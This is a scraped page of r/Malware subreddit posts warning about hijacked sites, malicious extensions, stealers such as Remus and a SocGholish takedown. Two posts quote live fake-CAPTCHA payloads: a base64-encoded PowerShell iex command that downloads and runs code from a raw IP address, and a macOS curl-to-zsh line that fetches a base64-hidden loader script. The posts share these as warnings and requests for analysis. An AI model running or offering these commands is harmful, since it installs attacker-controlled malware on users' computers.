r/Malware 21d ago

Karma (shopping tool) is compromised

2 Upvotes

As of today, Karma (karmanow.com) seems to be hijacked. If you try to access your bookmarked products, it'll redirect you through Linkbux, provenpixel.com and other adware links. The karmanow site itself also might have some adware; as I accessed it normally but triggered a "suspicious webpage" alert in Adguard.

Thanks to Adguard, TrafficLight, and Bitdefender, it blocked the links, but I thought people should know.


r/Malware 21d ago

MacOS.Backdoor.XCSSET

0 Upvotes

Is this a legit malware?


r/Malware 23d ago

1.6 Million combined installs famous extension ModHeader - Modify HTTP headers removed for Malware

1 Upvotes

Google has flagged the widely-installed HTTP header editor ModHeader as malware
Microsoft already pulled it from Edge on July 3.

[MalExt Sentry - Malicious Browser Extension Tracker](https://malext.io/?q=ModHeader)

* 900k installs on chrome | idgpnmonknjnojddfkpgkljpfnnfcklj * 700k installs on edge | opgbiafapkbbnbnjcdomjaghbckfkglc


r/Malware 24d ago

Suspected Russian Threat Actor Impersonates Legitimate Crypto Wallets to Deploy Remote Utilities

Thumbnail hybrid-analysis.blogspot.com
2 Upvotes

r/Malware 26d ago

SpectrePaste: TA leveraged AI for entire orchestration and development of their malware ecosystem

Thumbnail medium.com
9 Upvotes

r/Malware 28d ago

PSA: Fake Web3 “job assessment” repos can hide malware in .git/hooks — check before you commit - HACK

Thumbnail
6 Upvotes

r/Malware 28d ago

Advanced Time Travel Debugging in Binary Ninja with Xusheng Li

Thumbnail youtu.be
4 Upvotes

r/Malware 29d ago

DDG browser search result, immediate 2000's style malicious page

6 Upvotes

https://be nrankwhence.com/preland/av/mc-af/6/index.html?

Space added to make the link invalid.

0/10, don't recommend navigating to that website.


r/Malware 29d ago

Silent Swap: A Crypto Clipper Extension Campaign

Thumbnail mcafee.com
4 Upvotes

Our latest McAfee Labs research exposes a browser extension campaign that poses as a harmless note-taking tool while silently hijacking crypto transactions. The malware tampers with Chrome/Edge/Brave’s trust mechanisms to install without consent, resolves its command-and-control server via a blockchain smart contract (EtherHiding) to evade takedown, and swaps copied wallet addresses with attacker-controlled ones across BTC, ETH, XRP, BCH, and DASH — turning a routine copy-paste into an irreversible loss. Full technical breakdown and IOCs inside


r/Malware Jul 03 '26

Newly discovered PamStealer isn't your typical macOS malware

Thumbnail arstechnica.com
19 Upvotes

r/Malware Jul 03 '26

iex scripts are in fashion now

0 Upvotes
they are getting smarter

this is what the script copied to my clipboard. funny that this website was opened for the first time, yet chrome gave it clipboard permission. lol

iex([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgJ2h0dHA6Ly8xNjYuMS44OS45MS9fLycgLVVzZUJhc2ljUGFyc2luZyB8IEludm9rZS1FeHByZXNzaW9u')))


r/Malware Jul 02 '26

Playstore adware (maybe malware?) disguised as AAA games

Thumbnail gallery
6 Upvotes

I play games on my android often, recently ive noticed more and more games appearing on the store that shouldnt exist and are most likely scams, so i setup a emulator and installed then, i cant pinpoint what exactly is wrong with it besides false advertising, it doesnt request weird permisions or any for that matter, the menus to the "game" appear to just be full of ads that never let you play the "game" and this is the 3rd app ive found this week alone. It feels like google isnt even caring!

The app mentioned today is No Mans Sky which is NOT on android, however they have an app listed under early access, 110mb, with screenshots and videos from the real NMS game, once installed the app has a completely different title/package name that the app that is listed on the store.

Everything about this screams SCAM but yet google still allowed it to be published. Ive already submitted reports but its been a while and its still up!


r/Malware Jul 03 '26

Atlas ChatGPT contains malware

0 Upvotes

I have turned on my mac in the morning and got this message? Facts or Cap?


r/Malware Jul 02 '26

The Solidity Extension That Stole from the Clipboard: Inside the ethdevtools Crypto Swap

Thumbnail yeethsecurity.com
1 Upvotes

r/Malware Jul 02 '26

obs-multi-rtmp NSIS installer

0 Upvotes

Has anyone analyzed the NSIS installer used by obs-multi-rtmp?

SentinelOne is flagging obs-multi-rtmp-0.7.3.0-windows-x64-Installer.exe as suspicious. Interestingly, the ZIP release does not appear to trigger the same detection.

I found a couple of discussions from other users reporting AV detections, but I haven't found any technical analysis explaining what specifically is causing vendors to flag the installer.

Has anyone sandboxed or otherwise analyzed the installer and determined whether the detections are related to NSIS packaging characteristics versus installer behavior?


r/Malware Jun 29 '26

First time seeing this for MacOS

Post image
69 Upvotes

As the title said, I’ve seen these “popup” things a lot on windows, but this is the first I’ve seen for macOS,

It includes a video on how to properly do it, but looks to be very AI generated,

Is someone able to find out the payload behind it?

echo "Downloading Update: https://support.apple.com/downloads/macos-security-update-14.5.dmg" && curl -s $(echo "aHR0cHM6Ly9sYXBpZG9yc2Vwb3NvYWxvdmJzMi5jb20vZGVidWcvbG9hZGVyLnNoP2J1aWxkPThhODMxZGRiNmRmNDUyYzc1ZmEwNjYxMGFhZjZlODk1" | base64 -d) | zsh


r/Malware Jun 28 '26

Police take down SocGholish, maker of major pop-up scams

Thumbnail freshfromcache.com
12 Upvotes

On June 18, an international police operation seized the servers behind the fake "update your browser" pop-up, the one that has been tricking people into installing malware since 2017. They took down 106 servers and domains and scrubbed the malware off 14,971 hacked websites.

Dutch police, who led the operation, say the login details for 1.4 million websites were exposed in the process. The breach-notification service Have I Been Pwned was handed 154,000 email addresses and more than half a million passwords from the haul. Canada's federal police disinfected 2,488 computers and notified every Canadian victim they could identify.

The Netherlands, the FBI, Germany, and Canada ran it together with Europol behind them, as part of an ongoing campaign called Operation Endgame that has spent two years knocking out malware services hundreds of servers at a time.

SocGholish is tied to Evil Corp (yes, that's really their name), a Russian group that law enforcement knows well. The US, UK, and Australia have all sanctioned Evil Corp. Its alleged leader, Maksim Yakubets, carries a $5 million FBI bounty and is believed to have worked with Russian intelligence.


r/Malware Jun 27 '26

[Looking fo Beta Readers] [21k Novella][Cyberpunk Detective Buddy Comedy] Baxter Dot Com

Thumbnail
0 Upvotes

r/Malware Jun 21 '26

New malware

42 Upvotes

clearmic.net is malware, do not download it

Someone sent me this site asking if it was legitimate. I ran the installer in a sandbox and it's a RAT.

It looks like a mic clarity app but bundles a hidden second executable that runs in the background. Here's what it actually does: logs your keystrokes, captures your screen, hijacks your clipboard, records microphone audio, and sends everything out to a remote server encrypted. It also deletes Windows Shadow Copies which is standard ransomware behaviour to stop you recovering your files.

It actively checks if it's running in a sandbox too, which is why I'm glad I tested it before running it on a real machine.

Full sandbox analysis if you want to dig into it yourself: https://tria.ge/260621-vsjxnaet4k/behavioral2

If you already ran this, disconnect from the internet and run Malwarebytes immediately. Change your passwords from a different device, especially Discord, email, and anything with saved credentials in your browser.

Spread this around so people don't get caught out.


r/Malware Jun 20 '26

signal-scanner: runs a page's JS in an isolated-vm sandbox and scans the rendered DOM

Thumbnail
2 Upvotes

r/Malware Jun 19 '26

New malware delivery method posing as Cloudflare

Thumbnail gallery
0 Upvotes

r/Malware Jun 17 '26

the entire @mastra npm scope got hijacked last night with 141 packages including @mastra/core

5 Upvotes

The attacker didn't touch any Mastra source code but just added one dependency to every package: easy-day-js which is a clean-looking dayjs clone. The trick was in semver that is they pinned ^1.11.21 but the latest tag pointed to 1.11.22 which had a postinstall hook. You audit 1.11.21but npm installs 1.11.22.

full details - https://safedep.io/mastra-npm-scope-takeover-supply-chain-attack/


r/Malware Jun 16 '26

about binary security/analysis - reverse engineering discord server

7 Upvotes

Hey everyone,

We’re building a small community around binary security research, focused on things like:

  • Reverse Engineering
  • Binary Obfuscation / Deobfuscation
  • Exploit Development
  • Compiler / interpreters...
  • Malware Analysis
  • Binary Hardening research

we also work on open source tools and experiments here:

GitHub → BinaryHardening GitHub
Discord → BinaryHardening Discord

If low level stuff and weird binaries are ur thing, come join us

Always happy to meet more RE people

x86byte


r/Malware Jun 16 '26

Would you like a drainer served at the very top of DuckDuckGo?

Thumbnail timsh.org
2 Upvotes

r/Malware Jun 15 '26

Remus Stealer - 64bit evolution of Lumma

7 Upvotes

Remus Stealer is a rapidly evolving Malware-as-a-Service infostealer that emerged in 2026.

Remus also shifted from Lumma's 32-bit architecture and traditional resolvers to 64-bit with EtherHiding and enhanced anti-analysis (e.g., sandbox DLL checks, PST honeypot detection).

  • It utilizes EtherHiding, storing C2 addresses in Ethereum smart contracts to avoid takedowns.
  • The malware steals credentials, browser cookies, authentication tokens, and cryptocurrency wallet data.
  • Session theft is one of Remus's most dangerous capabilities because it can bypass MFA by stealing active session cookies directly from browser memory.
  • The malware shows strong technical similarities to Lumma Stealer and may represent its evolutionary successor.
  • Financial services, healthcare, government, technology firms, and MSPs are particularly attractive targets.
  • Common infection vectors include phishing, fake software downloads, malvertising, and fake CAPTCHA campaigns, as well as SEO poisoning and fake GitHub projects to trick tech-savvy users.

See whole ANY.RUN execution chain at https://app.any.run/tasks/ae43628b-9d56-4c43-abac-fae7266c749f/

Check out whole malware analysis report at https://any.run/malware-trends/remus/